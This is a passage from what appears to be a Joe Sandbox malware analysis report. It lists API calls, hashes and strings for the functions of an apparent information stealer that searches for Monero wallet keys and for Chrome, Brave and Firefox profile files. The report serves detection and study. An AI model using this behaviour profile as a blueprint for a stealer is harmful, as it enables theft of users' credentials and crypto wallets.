                      • Opcode Fuzzy Hash: 17a3791e00761e70c07cc8aab7031ae0b122ba0a69d4236031c3e84cb073cd75
                      • Instruction Fuzzy Hash: 4FE08670945308FFE7507BE09C0AB0D76B8AB05B01F101046F708B61D0D7B83A00DA9A
                      Function 004610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004610B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004610F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 1a9bfe55295fc07256170ba773490f6593786c2c22ae7433355f7bb7a15bba13
                      • Instruction ID: 2f124c68603b1d4de921dee1d8858735dbc740883212dda3b8434228d7326fe7
                      • Opcode Fuzzy Hash: 1a9bfe55295fc07256170ba773490f6593786c2c22ae7433355f7bb7a15bba13
                      • Instruction Fuzzy Hash: C8F0E9B1641204BBEB149AA49C49FBBB7D8D705715F305449F504E3390D675AE00CA55
                      Function 00461190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477910
                        • Part of subcall function 004778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00477917
                        • Part of subcall function 004778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0047792F
                        • Part of subcall function 00477850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004611B7), ref: 00477880
                        • Part of subcall function 00477850: RtlAllocateHeap.NTDLL(00000000), ref: 00477887
                        • Part of subcall function 00477850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0047789F
                      • ExitProcess.KERNEL32 ref: 004611C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 8274b43c9fafe5fd3da977a08e931416a1fa9a7d14c3e41eddd75189dc41bd64
                      • Instruction ID: a3c7826e4654f88fd5526a9bdbb7e047d9e631d9719452a0b0ef3f9f9b7358d6
                      • Opcode Fuzzy Hash: 8274b43c9fafe5fd3da977a08e931416a1fa9a7d14c3e41eddd75189dc41bd64
                      • Instruction Fuzzy Hash: D1E0ECB595420153CB0077F2AC0ABAB339D5B16349F08542FFA0992612FA2DF810C96F

                      Non-executed Functions

                      Function 004738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 004738CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 004738E3
                      • lstrcat.KERNEL32(?,?), ref: 00473935
                      • StrCmpCA.SHLWAPI(?,00480F70), ref: 00473947
                      • StrCmpCA.SHLWAPI(?,00480F74), ref: 0047395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00473C67
                      • FindClose.KERNEL32(000000FF), ref: 00473C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 6d057cc3cd765f53f362e0711a6b954cd453dcfaa296e0352f02e6e419430e18
                      • Instruction ID: 3bcc57884fd93d4ac4bf6526b995617f05888a7e48cf9f11caeda3348c01dc10
                      • Opcode Fuzzy Hash: 6d057cc3cd765f53f362e0711a6b954cd453dcfaa296e0352f02e6e419430e18
                      • Instruction Fuzzy Hash: 04A156B19002189BDB64EFA4DC85FFE7379BF45301F04858EA60D96141EB78AB84CF66
                      Function 00474910 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 0047492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00474943
                      • StrCmpCA.SHLWAPI(?,00480FDC), ref: 00474971
                      • StrCmpCA.SHLWAPI(?,00480FE0), ref: 00474987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00474B7D
                      • FindClose.KERNEL32(000000FF), ref: 00474B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*$0
                      • API String ID: 180737720-562914289
                      • Opcode ID: 32d4b60214245ea662a4a07d956e5b074ed76079c6c929c62de45db311813cee
                      • Instruction ID: 31a07c8ddfdfed78c3d8a690cc0f6c8e4cab2b9d9b48876522fef77996f6f88e
                      • Opcode Fuzzy Hash: 32d4b60214245ea662a4a07d956e5b074ed76079c6c929c62de45db311813cee
                      • Instruction Fuzzy Hash: 6E6145B1910118ABCB60FBE0DC45EEE737DBB89700F04858EA60D96140EB78EB45CF95
                      Function 0046BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00480B32,00480B2B,00000000,?,?,?,004813F4,00480B2A), ref: 0046BEF5
                      • StrCmpCA.SHLWAPI(?,004813F8), ref: 0046BF4D
                      • StrCmpCA.SHLWAPI(?,004813FC), ref: 0046BF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046C7BF
                      • FindClose.KERNEL32(000000FF), ref: 0046C7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 26802c1bb2541936edcb4129cce410d687ddc38100b71fd8cd897250f7681a3b
                      • Instruction ID: 7c097093b20a4a25060bf7b390081e01418f749d162a89b0a8f58037864aa551
                      • Opcode Fuzzy Hash: 26802c1bb2541936edcb4129cce410d687ddc38100b71fd8cd897250f7681a3b
                      • Instruction Fuzzy Hash: C242857190010497CB14FBB1DD96EEE733DAF84304F40855EB90A96191EF38AB59CBAB
                      Function 00474570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00474580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00474587
                      • wsprintfA.USER32 ref: 004745A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 004745BD
                      • StrCmpCA.SHLWAPI(?,00480FC4), ref: 004745EB
                      • StrCmpCA.SHLWAPI(?,00480FC8), ref: 00474601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0047468B
                      • FindClose.KERNEL32(000000FF), ref: 004746A0
                      • lstrcat.KERNEL32(?,00E8E230), ref: 004746C5
                      • lstrcat.KERNEL32(?,00E8D1F8), ref: 004746D8
                      • lstrlen.KERNEL32(?), ref: 004746E5
                      • lstrlen.KERNEL32(?), ref: 004746F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*$0
                      • API String ID: 671575355-2955795000
                      • Opcode ID: fc9755106767d0894ec18d17e0ae63a4c92e186511b4cd3da9ec6689c79ca81b
                      • Instruction ID: 567b18084694f579f57213b73da0fbe1ed532b4075b8429579f11f14c5abe7bc
                      • Opcode Fuzzy Hash: fc9755106767d0894ec18d17e0ae63a4c92e186511b4cd3da9ec6689c79ca81b
                      • Instruction Fuzzy Hash: 065166B5550218ABC764FBB0DC89FEE737DAB54300F40858AB60D92150EB78EB84CF96
                      Function 00473EA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 00473EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00473EDA
                      • StrCmpCA.SHLWAPI(?,00480FAC), ref: 00473F08
                      • StrCmpCA.SHLWAPI(?,00480FB0), ref: 00473F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0047406C
                      • FindClose.KERNEL32(000000FF), ref: 00474081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$0
                      • API String ID: 180737720-3690862327
                      • Opcode ID: 0b8a60b26f76aaedcf8a2aa466a7b79df4e21ce05be63615acbafe8fa566bd45
                      • Instruction ID: daefb126cd45605ca6b2f5d973187272c3bf82a41e05b6bf8f56423e646a35d0
                      • Opcode Fuzzy Hash: 0b8a60b26f76aaedcf8a2aa466a7b79df4e21ce05be63615acbafe8fa566bd45
                      • Instruction Fuzzy Hash: 3E5133B2900218ABCB64FBA0DC45EEA737DBB44304F00858EB65996140EB79AB89CF55
                      Function 0046ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 0046ED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 0046ED55
                      • StrCmpCA.SHLWAPI(?,00481538), ref: 0046EDAB
                      • StrCmpCA.SHLWAPI(?,0048153C), ref: 0046EDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046F2AE
                      • FindClose.KERNEL32(000000FF), ref: 0046F2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: a7d52ff333251c7bfee4a32b22f0a5cd676395c84c1313f16c5a29e5e0f2c8a6
                      • Instruction ID: 6ef5f4e43cac664f1c3145998c227907d551933b044b8bf33f937c40ab08d07c
                      • Opcode Fuzzy Hash: a7d52ff333251c7bfee4a32b22f0a5cd676395c84c1313f16c5a29e5e0f2c8a6
                      • Instruction Fuzzy Hash: 54E133B18111189ADB54FB61CC51EEE7338AF94304F40859EB51E62052EF386F9ACF6A
                      Function 0046F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004815B8,00480D96), ref: 0046F71E
                      • StrCmpCA.SHLWAPI(?,004815BC), ref: 0046F76F
                      • StrCmpCA.SHLWAPI(?,004815C0), ref: 0046F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0046FAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: b664eed5d5872376b5967753fd8e7060f88919faa95157eefab04e589a84d6f2
                      • Instruction ID: 70466d8c42d3f3c3f59aac13788b61a996e733f5505914ca79f799d6fe69362d
                      • Opcode Fuzzy Hash: b664eed5d5872376b5967753fd8e7060f88919faa95157eefab04e589a84d6f2
                      • Instruction Fuzzy Hash: 30B162719001049BCB24FF65DC56AEE7379AF94304F0085AEA40E97151EF38AB59CF9B
                      Function 004616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0048510C,?,?,?,004851B4,?,?,00000000,?,00000000), ref: 00461923
                      • StrCmpCA.SHLWAPI(?,0048525C), ref: 00461973
                      • StrCmpCA.SHLWAPI(?,00485304), ref: 00461989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00461D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00461DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00461E20
                      • FindClose.KERNEL32(000000FF), ref: 00461E32
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
